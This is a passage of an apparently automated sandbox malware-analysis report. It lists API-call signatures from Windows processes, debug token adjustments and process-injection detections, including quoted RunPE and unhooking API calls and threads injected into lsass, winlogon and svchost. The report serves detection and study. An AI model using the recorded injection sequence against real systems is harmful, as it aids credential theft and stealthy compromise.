Source: C:\Windows\System32\cmd.exeCode function: 19_2_0000022413901D30 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
Source: C:\Windows\System32\cmd.exeCode function: 19_2_000002241390CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\cmd.exeCode function: 19_2_00000224139084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\cmd.exeCode function: 19_2_0000022413908814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\cmd.exeCode function: 19_2_000002241393CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\cmd.exeCode function: 19_2_00000224139384B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\cmd.exeCode function: 19_2_0000022413938814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\conhost.exeCode function: 20_2_000002BCD7E3CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\conhost.exeCode function: 20_2_000002BCD7E384B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\conhost.exeCode function: 20_2_000002BCD7E38814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\conhost.exeCode function: 37_2_0000026504EA84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\conhost.exeCode function: 37_2_0000026504EA8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\conhost.exeCode function: 37_2_0000026504EACD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000025DC1AC84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000025DC1AC8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000025DC1ACCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000025DC1CE84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000025DC1CE8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000025DC1CECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_00000225DC648814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_00000225DC6484B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_00000225DC64CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_00000225DC678814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_00000225DC6784B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_00000225DC67CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\lsass.exeCode function: 40_2_00000202C0AE84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\lsass.exeCode function: 40_2_00000202C0AE8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\lsass.exeCode function: 40_2_00000202C0AECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exeCode function: 41_2_000002A66130CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exeCode function: 41_2_000002A661308814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\svchost.exeCode function: 41_2_000002A6613084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\dwm.exeCode function: 42_2_000002BAAEDCCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\dwm.exeCode function: 42_2_000002BAAEDC8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\dwm.exeCode function: 42_2_000002BAAEDC84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\dwm.exeCode function: 42_2_000002BAAEE4CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\dwm.exeCode function: 42_2_000002BAAEE48814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\dwm.exeCode function: 42_2_000002BAAEE484B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exeCode function: 43_2_0000026A879C84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exeCode function: 43_2_0000026A879C8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\svchost.exeCode function: 43_2_0000026A879CCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exeCode function: 43_2_0000026A87F484B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exeCode function: 43_2_0000026A87F48814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\svchost.exeCode function: 43_2_0000026A87F4CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000179537ACD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000179537A84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000179537A8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000179537DCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000179537D84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000179537D8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 45_2_0000016CE6538814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 45_2_0000016CE65384B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 45_2_0000016CE653CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exeCode function: 46_2_000002295D56CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exeCode function: 46_2_000002295D568814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\svchost.exeCode function: 46_2_000002295D5684B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion

barindex
.NET source code contains process injector
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs.Net Code: Run contains injection code
Source: 36.2.powershell.exe.1c2db260000.14.raw.unpack, RunPE.cs.Net Code: Run contains injection code
.NET source code references suspicious native API functions
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, Unhook.csReference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.csReference to suspicious API methods: OpenProcess(128, inheritHandle: false, parentProcessId)
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.csReference to suspicious API methods: NtAllocateVirtualMemory(process, ref address, IntPtr.Zero, ref size2, 12288u, 64u)
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.csReference to suspicious API methods: NtWriteVirtualMemory(process, address, payload, num3, IntPtr.Zero)
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.csReference to suspicious API methods: NtSetContextThread(thread, intPtr5)
Contains functionality to inject code into remote processes
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000000140002434 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,OpenProcess,TerminateProcess,
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe EIP: 2F00000
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\winlogon.exe EIP: DC612EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\lsass.exe EIP: C0AB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 612D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\winlogon.exe EIP: DC612EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\lsass.exe EIP: C0AB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 612D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\dwm.exe EIP: AEDB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 87992EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 53772EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 5D532EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 67D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\dwm.exe EIP: AED82EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 87992EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 53772EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 5D532EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 67D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 5B3C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 5B392EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: EBFD2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: ECD72EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 59072EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: A9E72EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 73162EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 4E862EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 59042EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: A9E72EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 73162EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 4E862EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 47B32EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 473C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 70062EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 6F9D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 84262EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 83BC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: D3FA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: D3F72EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: A4182EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BDF32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C0262EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C9F32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 645B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B2A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4F62EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BDF32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2AB42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C0262EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4ADB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C9F32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1992EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 645B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25DA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B2A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F5352EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4F62EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F0D62EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2AB42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FFB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4ADB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C2572EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1992EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8BCF2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25DA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 66902EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F5352EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13FF2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F0D62EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8D572EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FFB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 69B42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C2572EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CC742EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8BCF2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5DA72EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 66902EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 199D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13FF2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F3892EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8D572EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3B82EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 69B42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 40E42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CC742EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A6532EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27BC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B152EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F3892EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 621A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 40E42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F482EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A6532EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8B4B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27BC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 683D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B152EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 32F2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 621A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E262EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F482EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6C5E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8B4B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D5932EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 683D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 32F2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FC652EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E262EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 777C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6C5E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 33B42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D5932EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8D0A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FC652EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AB4C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 777C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A642EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 33B42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6CF32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AB4C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 49352EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A642EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 60DA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6CF32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5E7B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 49352EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F7C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 60DA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E8152EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5E7B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 52342EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F7C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9DA92EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E8152EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9DAC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 60312EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 602E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E2532EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E2562EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4C592EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4C5C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CC7D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CCA02EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 83F12EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 83F42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27022EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27052EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 31082EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 310B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BE25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BE25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14425AC
